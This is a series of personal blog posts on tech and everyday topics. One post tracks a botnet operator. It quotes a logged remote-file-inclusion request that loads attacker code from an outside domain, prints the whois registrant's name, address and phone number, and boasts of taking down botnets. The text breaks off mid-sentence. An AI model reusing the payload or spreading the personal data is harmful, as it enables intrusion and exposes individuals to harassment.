Based on a few modules he can judge my background and knowledge? C'mon! Especially after last week's Dutch Perl Workshop I do not consider my Perl knowledge that good.

This must be a joke, I figured and started looking at the links in the mail. They all linked to the real google.com site. Mmmm, headers? Sure enough it looks like it's coming from Google. It hits a few google corp relays.

Unlike Lee, who wrote about a similar mail, I think this is the lowest kind of recruitment, for it's simply canned spam. Maybe my first assignment at Google would be to write a script to send out even more emails to Python, Ruby and other programmers? ;-)

If they did take time to learn about the people they contact, as Lee claims, they would have found my posts on google eq evil

Shame on you spammers! Shame on you google!

My country is plagued with free newspapers. The train stations are flooded by three free newspapers, being De Pers, Spits, and Metro.

The first one claims to be a quality newspaper, while the latter two are just plain horrible and I refused to read them for a while now. Today, however, I decided to give the Metro paper another chance, and unfortunately, it was the last time.

In Indonesia, addressing another human being always goes hand in hand with polite forms. Females are addressed with mbak, or ibu (depending on the age), males with mas or bapak (also depending on the age of the man).

These polite forms go far. Husbands and wives use these "titles", even brothers and sisters. Therefore, almost every one calls me mas (I'm not so old yet ;-) or bapak (or bule which refers to my skin color (white) and being a foreigner).

Today, the Metro paper posted an article about a tragic event about a woman poisoning her four kids and herself, out of money problems. This she apparently recorded with her cell phone.

The article is in Dutch, so I'll translate just a phrase:

In a goodbye letter to her husband Pak, the woman wrote: "Pak, the money is gone. I took the kids to show them heaven".

The name of the husband is not Pak! That's just the abbreviation of Bapak!

As it turns out, the Metro "journalists" just copy news and add their own incorrect conclusions. That's it Metro, now I will stop reading your paper ... again.

I bet a lot of geeks like me are curious what it takes to launch and manage a successful website. To answer these questions, I'll contact the owners of such websites and just ask them :-)

Today, the first episode about: 30 Boxes (which is also one of my favourite websites at the moment). 30 Boxes offers users a calendar system that is rather quite impressive. Usability seems to be the main goal, which results in an intuitive calendar that actually makes it fun to update. Add some command line scripts to it and you can say you have a successful website!

They host their servers at The Planet (or so it seems).

Nick of 30boxes.com was so kind to answer the following questions:

1. When did you start with 30 Boxes and what made you think of this idea?
The three of us (Narendra, Julie, and myself had the simple need of seeing each other's calendar to schedule social things and vacations together, and we needed on-line access to we could see them from anywhere (work, phones, friends houses, etc).

2. Google's 'tag-line' is "don't be evil", what is yours?
"It's Your Life" is the primary tagline. Sometimes we use "Life inside a box isn't all bad".

3. How many people are currently involved in operating this service?
3

4. How many users (approximately) do you currently have?
85,000

5. How much bandwidth would you say your users generate?
Don't know.

6. What is used for operating your site (amount of servers, operating systems, CPU/RAM, programming languages.)?
2 quad-proc Intel servers with 2GB ram each.

7. What made you choose the programming language(s) you're currently using?
PHP, Mysql, Linux. Free, enormous support available. Easy to use.

8. What are the future plans for 30 Boxes?
We have finished most of the product development we envisioned and will focus on gaining more users and collaborating with other services.

---

The fun part -to me- is that only 3 people can generate a product like this, which definately blows away the competition (like Yahoo! and Google). Well done and keep it up!

Joffie pointed out last night that his team is currently taking the lead in the infamous Derby Dead Pool.

The Derby Dead Pool is described as:

"The sickest site on the Internet...a ghoulish competition..."
"Arguably the world's most popular 'Dead Pool' competition"
"No-one gets hurt in this game of death"

I however would like to describe it as "a game for people who have way too much time on their hands", like Joffie ;-)

It's all about predicting who will die within a year. For each death you predicted, you get points. That is, the death must be mentioned in a British national newspaper or on the BBC News website. Extra points are credited for originality, unnatural causes, age of the celebrity and other things.

Too bad Joffie didn't list Geert Wilders, then again, it's not a wishlist ;-)

Joffie's team is called "Death from Above" which, if I recall correctly, had nothing to do with Marduk's song Baptism by Fire

Congrats Joffie, keep it up!

Pipes is being hyped, so let's feed the hype a little.

When I first noticed the mail announcing pipes, I immediately thought: "This sounds a lot like Plagger" (a killer Perl app I should have blogged about before, sorry Tatsuhiko ;-)

Pipes does what Plagger does, only with a shiny web interface. As usual, I find eye candy fun for a second, but can never make them work ;-) So far, I have tried to create a "pipe" at Yahoo's version, without any result. With Plagger, on the other hand, I had my first example running in seconds (not counting installing half a terabyte on CPAN modules ;-)

What struck me most though, was the name. Pipes ... why pipes? Was it a direct theft from Plagger? After all, Plagger's tag line is "the UNIX pipe programming for Web 2.0". "This must piss Tatsuhiko off", I thought, but it looks like he's ok with it.

I'll have to let these pipes sink in a little. So far, I'm not too impressed by what I have seen, but since it's now up to the users, something cool might come out of this.

Every now and then, there's a need to find horrible songs from the past. Think Vanilla Ice, Kriss Kross, Jason Donovan, and many many others. I tried to top this by old Dutch songs, and went searching for "Brandend Zand", a Dutch song by Anneke Grönloh

But searching for just the title and "mp3" led me to the page of George Welling

Soon I realized this guy is awesome! Let's look at his page translated (by babelfish.yahoo.com).

First of all, the title of his CD is "Erg he", which is hard to translate, but I hope I can catch it with: "Bad, ain't it?". It's always good to see an artist who - unlike many rappers - think their music isn't all that. Ok, agreed, it's not the best singer ever, but neither is Wesley Willis (another one of my heroes).

The fun part of George's site though, is that you can browse each directory. That led me to his pictures of Indonesia

Those images are quite recent and it's funny to see him take almost the same trip as I did (I have never been to Aceh (?) nor to the top of the Bromo before though). Let's compare some pictures (I hope he doesn't mind me mirroring smaller copies of his images, if so, George, let me know and I'll remove them from my server!).

Now, for those who wondered. Here is the original Brandend Zand (by Anneke) and the cover by George

As you undoubtedly have noticed by now, Indonesia is, once again, being tortured by Mother Nature. After a tsunami, many earthquakes, volcanic activity, we still lacked this act: flooding.

Flickr has some beautiful images on this:

What can you do besides waiting (and/or playing ?). I hope the water level soon drops, so normal life can be restored. Take care Jakarta!

---

Update: the first picture is not from this year's flooding, it's from 2006, but it's just too nice to remove ;-)

Today I was surprised by Yahoo Mail. Usually, I can access the beta version without a problem, but for some reason, Yahoo deemed it necessary to block linux users. Why, oh why? It was working rather well!

image hosted by photobucket.

The solution? Get MS Windows or a Mac. Yahoo, why hast thou forsaken us Linux users?

---

Update: another, simpler solution workaround is to use the User Agent Switcher Extension (and set it to FireFox 2.0, WinXP).

Today I was surprised by Yahoo Mail. Usually, I can access the beta version without a problem, but for some reason, Yahoo deemed it necessary to block linux users. Why, oh why? It was working rather well!

image hosted by photobucket.

The solution? Get MS Windows or a Mac. Yahoo, why hast thou forsaken us Linux users?

---

Update: another, simpler solution workaround is to use the User Agent Switcher Extension (and set it to FireFox 2.0, WinXP).

Good blogger Bok noticed a major decrease in comment spam by blocking a single IP address. Of course, I had to see if this host was also spamming the heck out of my blog, but no. The IP address was not present in my logfiles, so I assume I'm still out of his/her reach.

Nevertheless, it got me thinking that blocking certain IPs might help stopping comment spam. I log the IP address and time stamp of each spam attack in a certain logfile (format: timestamp|IP address) so a list of top 10 offenders was easily created:

$ awk -F"|" '{ a[$2]++ } END { for (i in a) print a[i]":\t"i }' spammers.db  | \
  sort -n -r | head -10
604:    81.95.146.162
120:    69.46.16.231
74:     195.225.177.3
52:     85.255.119.74
50:     209.160.40.114
42:     72.36.226.10
41:     85.255.119.130
40:     66.36.229.227
35:     72.232.37.250
33:     75.126.21.163

I've added these addresses to my pf blocklist. Let's see if it'll work.

... why am I not surprised to see the ISP that refused to do anything about botnets at number 6?

After doing my homework for my Indonesian language course, I wondered if there was a module already that would transform numbers in the right written Indonesian equivalent. For instance, 10 would return sepuluh (= ten).

Of course it already exists and once again I didn't get to write a module for it. Instead, I wrote my little extra homework generator for it, being Latihan Angka 1, and Latihan Angka 2.

(for those curious, Latihan Angka means Number Practice)

Terima kasih, Steven Haryanto!

As mentioned before I've been obsessed with stopping botnets. Well, this one, operated by a script kiddie named "fazanul".

Today I've seen his attack on my machine again. And, after sending the usual abuse emails, I've decided to have a little chat with him. As I feared, this is the ultimate script kiddie. But first, a little about his latest "attack".

The attack this time was launched using a new host:

GET /p/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?
  + mosConfig_absolute_path=http://fazanul.com/c.txt? HTTP/1.1

Fazanul.com? Interesting! This kiddie was stupid enough to register a domain. He's, however, still abusing the Savant2 hole. So who's behind fazanul.com?

$ gwhois fazanul.com
[...]
Domain Name.......... fazanul.com
  Creation Date........ 2007-01-23
  Registration Date.... 2007-01-23
  Expiry Date.......... 2008-01-23
  Organisation Name.... Stanley Livingston
  Organisation Address. 455 Rose Quartz Place
  Organisation Address. 
  Organisation Address. Castle Rock
  Organisation Address. 80108
  Organisation Address. CO
  Organisation Address. UNITED STATES

Admin Name........... Stanley Livingston
  Admin Address........ 455 Rose Quartz Place
  Admin Address........ 
  Admin Address........ Castle Rock
  Admin Address........ 80108
  Admin Address........ CO
  Admin Address........ UNITED STATES
  Admin Email.......... fazanul5004@yahoo.com
  Admin Phone.......... +1.9094813680
  Admin Fax............ 

Tech Name............ YahooDomains TechContact
  Tech Address......... 701 First Ave.
  Tech Address......... 
  Tech Address......... Sunnyvale
  Tech Address......... 94089
  Tech Address......... CA
  Tech Address......... UNITED STATES
  Tech Email........... domain.tech@YAHOO-INC.COM
  Tech Phone........... +1.6198813096
  Tech Fax............. 
  Name Server.......... yns1.yahoo.com
  Name Server.......... yns2.yahoo.com

You've got to be kidding me! He registered it today! And look at that, we have fazanul5004@yahoo.com, and it looks like Yahoo is hosting this domain.

$ host fazanul.com
fazanul.com has address 68.142.212.125
fazanul.com has address 68.142.212.126
fazanul.com has address 68.142.212.127
fazanul.com has address 68.142.212.128
fazanul.com has address 68.142.212.129
fazanul.com has address 68.142.212.130
fazanul.com mail is handled by 20 mx1.biz.mail.yahoo.com.
fazanul.com mail is handled by 30 mx5.biz.mail.yahoo.com.

Ugh, yeah, the files are even hosted by Yahoo (the IPs belong to Yahoo). So those should be gone within 48 hours ;-)

So, now that we've found his domain, let's have a little chat with him. He chose Bucharest.RO.EU.Ultra-Chat.Org again as command center, yet this time the channel #out. Let's login, and why not use the nickname Sorin (remember? ;-)

Here's what happened... enjoy (the red comments are added by me later)

<Sorin> Fazanul!
<Sorin> You're back :-)
<Sorin> Let's see how long fazanul.com will last
<fazanul> ??
<fazanul> what?
<Sorin> I've killed your MUIE botnet before ... and another one after that I
          believe ...
<Sorin> let's see how long it'll take to kill this botnet
<Sorin> But ermm, registering your domain @ yahoo?!? Are you crazy man?
<fazanul> nop
<fazanul> haking host
<Sorin> Ok ... well, let's see how long these drones here will last
<Sorin> Oh you now hack domain registry servers?
<fazanul> yeah
<Sorin> Ah ok ... somehow I have a hard time believing you. Your botnet Perl
          scripts look like crappy cut'n'paste jobs, not showing too much
          knowledge and full of script kiddie fingerprints ...
<fazanul> i have haking host and redirect and domains
<Sorin> fazanul.com has address 68.142.212.128
<fazanul> domains by yahooo
<Sorin> The whois points to yahoo, the IP points to yahoo ... so you hack
          Yahoo's Domain Registry service. Sweet
<fazanul> lollll

Yeah right ... he's registering domains through Yahoo himself now?

<Sorin> anyways, let's see how long it'll be up.
<fazanul> ok man 
<fazanul> part
<fazanul> by channels
<fazanul> i have work
<Sorin> Can't you ban me? Like usually? ;-)
<fazanul> nop
<fazanul> part you
<Sorin> Oh well, will see your next "attack" ... and remember I'll stop those
          too ;-P
<Sorin> #muie is awfully empty ...
<fazanul> yeah
<fazanul> stop

Did he just ask me to *stop* attacking his botnets?!?

<Sorin> Why? You attack my machine, I attack you. Too bad I'm a little more
          successful
<fazanul> what machine you?
<Sorin> Oh come on ... I won't tell you. That's spoiling the fun. I don't
          know your next move, you don't know my host
<fazanul> ntroduction
<fazanul> E-mail for several domains are handled by mail.b10m.net
          <212.238.141.98>, most likely the domain you've tried to reach
          too.
[snipped more info from mail.b10m.net here]

I logged in the IRC channel, from this machine (mail.b10m.net). 
He was clever enough to look that up. Unfortunately for him, 
the attacks are *not* launched on this vhost ;-)

Anyways, now we know *his* IP address: 

212.138.64.171 - - [22/Jan/2007:23:36:54 +0100] "GET / HTTP/1.0" 200 3240 
"-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.9) 
Gecko/20061206 Firefox/1.5.0.9"


<fazanul> ....
<fazanul> understand
<Sorin> Oh, you got me there.
<Sorin> Darn it
<fazanul> -mail for several domains are handled by mail.b10m.net
          <212.238.141.98>
<fazanul> :))))
<fazanul> hashahahahaha

Funny, he actually pointed me out to a typo. That IP address *used* to